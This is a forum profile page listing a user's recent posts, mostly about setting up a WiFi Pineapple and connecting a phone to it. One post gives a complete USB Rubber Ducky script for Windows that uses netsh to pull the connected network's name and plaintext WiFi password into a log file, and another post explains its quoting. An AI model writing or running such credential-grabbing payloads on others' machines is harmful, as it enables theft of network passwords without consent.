Jump to content

RickyHax20

Active Members
  • Posts

    12
  • Joined

  • Last visited

About RickyHax20

  • Birthday 09/30/1996

Profile Information

  • Gender
    Male
  • Location
    Texas
  • Interests
    Games, Sports, and Technology.

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

RickyHax20's Achievements

Newbie

Newbie (1/14)

  1. Never mind about it... I was connecting to the management AP at the time. When I mean "time after time" I meant that when I enter the password (that is the correct one) it tries to connect and asks me for the password again.
  2. You don't put the @ when putting it in the command prompt. You put the @ when creating the ducky script. If the @ symbol is typed in the ducky script when creating the payload, the command prompt will replace every @ to " and vice-versa. That's why I put it in REM in bold " REM The @ will be typed as " in the Command prompt "
  3. I have an iPhone 7, and I was testing out the modules that needed me to go on random sites. So basically I could connect my phone to the Pineapple, however, I can't anymore, it will tell me time after time to enter the password, so I did and tells me to enter the password, but never told me that the password is incorrect. How can I fix this??? When I came across this problem before, I would change the password and it would let me through after entering the new password, but when I did this, it kept telling me to enter the password. What am I doing wrong or is there a solution for me to click on my pineapple wifi on my phone and have it connect as it remembers it before???
  4. Everything is all good for me. Did the Firmware recovery and works fine. Thanks!!!
  5. Ok, as this is being typed, I'm resetting it through the firmware recovery... How would I know that the restart is complete and I can start the setup again? Don't know when you'll reply, but hopefully soon.
  6. I have the same problem but I was just setting it up. I followed the instructions and held the reset button to setup, and had the update or whatever finished and tried refreshing it but still says "Took too long to respond"
  7. Ok, so here's a payoad that can grab any of the wifi info that the computer is connected to. To find the info once the payload is finished, you need to search for "Log.txt" Only works on Windows DELAY 1000 GUI r DELAY 500 STRING cmd ENTER DELAY 1000 REM The @ will be typed as " in the Command prompt STRING cd @%USERPROFILE%\Desktop@ & for /f @tokens=2 delims=: @ %A in ('netsh wlan show interface ^| findstr @SSID@ ^| findstr /v @BSSID@') do set A=%A ENTER DELAY 100 STRING netsh wlan show profiles %A% key=clear | findstr /c:@Network type@ /c:@Authentication@ /c:@Key Content@ | findstr /v @broadcast@ | findstr /v @Radio@>>A.txt ENTER DELAY 100 STRING for /f @tokens=3 delims=: @ %A in ('findstr @Network type@ A.txt') do set B=%A ENTER DELAY 100 STRING for /f @tokens=2 delims=: @ %A in ('findstr @Authentication@ A.txt') do set C=%A ENTER DELAY 100 STRING for /f @tokens=3 delims=: @ %A in ('findstr @Key Content@ A.txt') do set D=%A ENTER DELAY 100 STRING del A.txt ENTER DELAY 100 STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt ENTER Feel free to ask any questions and if there's any errors that need to be fixed on to this.
  8. I need help on setting up my pineapple. I was just doing fine with the setup until I had to go to the ip address. It didn't go through for a while, but managed to connect. When I pushed the reset button, like I suppose to do, and as it completed, I tried refreshing the page or something and didn't go through and went to saying, "took too long to respond." I kept on trying to reconnect and would not go through... I tried to reset it but don't know how to do it since it's not fully setup. I noticed that when i connect the pineapple, the blue LED light was on for about 5 seconds, and turns off. Don't know how I can fix this and nobody has any similar problems to mine... I just got this today and I hope I don't have to return it and get my money back...
×
×
  • Create New...